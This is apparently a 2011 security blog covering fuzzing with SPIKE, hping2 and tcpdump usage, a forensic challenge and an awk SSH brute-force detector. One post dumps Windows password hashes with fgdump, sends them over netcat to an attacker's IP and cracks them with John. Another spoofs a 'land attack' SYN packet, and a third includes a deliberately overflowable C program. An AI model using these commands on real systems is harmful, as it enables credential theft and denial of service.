Monday, December 12, 2011

What works in software security testing

... at least in opinion's of two companies that treat software security more and more seriously (Microsoft) and lives from software (in)security (Matasano Chargen):

Here's an interesting series of articles from Microsoft

Here's much shorter article from Matasano

Wednesday, August 17, 2011

Introduction to fuzzing

Fuzzing is an effective technique for finding potential security bugs in software. I will show two examples of fuzzing using SPIKE and SPIKEfile frameworks.

SPIKE is framework for fuzzing network protocols. Let's say that we want to o fuzz UDP server that communicates using very simple protocol:


So in the packet there are sent: length (32 bit integer) and string (of earlier sent length). To fuzz it we create following SPIKE script (mz.spk):

s_blocksize_string("fileformat", 4);
s_string(" ");

Now we can execute generic_send_udp fuzzer from SPIKE framework:

$ ./generic_send_udp 81 mz.spk 0 0 10

We can observe packets sent by the fuzzer with tcpdump:

$ sudo tcpdump -i lo -n -X udp port 81

SPIKEfile is fuzzer based on SPIKE for file formats fuzzing. Let's consider badly vulnerable, sample application that opens a file (with format identical with packet format that we discussed above):

 int main(int argc, char **argv)
    FILE *f = fopen(argv[1], "r");
    int num;
    char array[650] = {0};

    fscanf(f, "%d %s", &num, array);

    printf("num: %d, array: %s\n", num, array);
    return 0;

As we can see, data from the file is copied to array without any length checking. We will fuzz it the same way as previous (using the same SPIKE script) but with SPIKEfile fuzzer:

$ ./SPIKEfile -f mz.spk 0 0 "./vuln_app %FILENAME%"

On each crash SPIKEfile will generate report with stack dump.

This two simple examples show philosophy behind fuzzing using SPIKE based fuzzers. When we have more complicated network protocol or file format, our SPIKE script is much longer (the better we now fuzzed protocol/file format the more effective fuzzing becomes) but the approch is the same.

Thursday, July 7, 2011

hping2 and tcpdump

Common use cases:

1) configuring tcpdump to display all packets with your machine's IP address and the IP address of the target machine, in either direction

# tcpdump -nn host <my_machine_ip> and host <target_machine_ip>

2) Pinging with choosen payload

$ hping2 --icmp --data 40 --file <file_with_payload> <dest_addr>

# tcpdump -nnX icmp    # shows us only icmp traffic in hex and ASCII formats without any names

3) Lunching "land attack"*

$ hping2 --count 1 --baseport 80 --destport 80 --syn --spoof <victim_addr> <victim_addr>

# tcpdump -nn tcp and host <victim_addr>

* land attack is an attack in which SYN packet with src IP addr equal to dest IP addr and src port equal to dst port is sent to the victim

Tuesday, May 17, 2011

Challenge 7 of the Forensic Challenge 2011

Challenge 7 "Forensic analysis of a compromised server" from the Honeynet Project has come to the end. I've got 20 from 23 possible points plus 2 bonus points - not bad at all! Here you can find my answers.

Tuesday, April 5, 2011

The power of Awk

Recently I've been busy with analyzing results of Challenge 5 of the Honeynet Forensic Challenge. The winner has written nice script for analyzing auth.log file. The script is written in Python and can be found here. I decided to implement such script in Awk. It turned out tha Awk is perfectly suited to this kind of work, here's the script:

cat auth.log | awk '
    $0 !~ /sshd/ {next};
    /invalid/ {ip=$13};
    /Failed/ {
        Fails[ip] += 1;
        if(Fails[ip] == 1)
            StartTime[ip] = $1 " " $2 " " $3;
        EndTime[ip] = $1 " " $2 " " $3;
    /Accepted/ {
        if(Fails[ip] > 0) {
            Accepts[ip] += 1;
            Details[ip] = sprintf("%s %s %s\n", Details[ip], $1 " " $2 " " $3, $9);

    END {
        for(key in Fails) {
            if((Fails[key] > 0) && (Accepts[key]/Fails[key] < 0.1 )) {
                print "Attacker IP: " key
                print "Start time: " StartTime[key]
                print "End time: " EndTime[key]
                print "Login attempts: " Fails[key]
                if(Accepts[key] > 0) {
                    print "Successfull attempts: " Accepts[key];
                    print Details[key];
                printf "\n"

About 26 lines of code as opposed to 136 lines of Python version!

And here's one-liner (shorter but less verbose) version of the script:

 $ cat auth.log | awk '$0 !~ /sshd/ {next}; {ip=$11}; /invalid/ {ip=$13}; /Failed/ {Fails[ip] += 1 }; /Accepted/ {if(Fails[ip] > 0) Accepts[ip] += 1 }; END { for(key in Fails) {if((Fails[key] > 0) && (Accepts[key]/Fails[key] < 0.1 )) print key": "Fails[key] "\t Successes: " Accepts[key]} }'

Friday, March 11, 2011

Basics of Windows password recovery

In this post I outline basics steps for successful Windows password recovery.
Tools used: fgdump, john the ripper

On target machine as Administrator:

C:\> fgdump.exe -c        # dumps passwords from local windows box to file

we use netcat to send dumped hashes to attacker's machine, attacker's machine:

$ nc -l -p 2222 > sam.txt

target machine:

C:\> nc <attackers_ip> 2222 <

On attacker's machine:

$ ./john --session=recovery1

We can stop guessing session with ^C and restore it with:

$ ./john --session=recovery1

Spacebar shows us speed of recovery. Recoverd passwords are in john.pot file, to save them in a file:

$ john --show >

It's basic use scenario of recovering passwords. There's more about john (modes of operation, distributing computation among several machines, optimizing key space). More on it in future.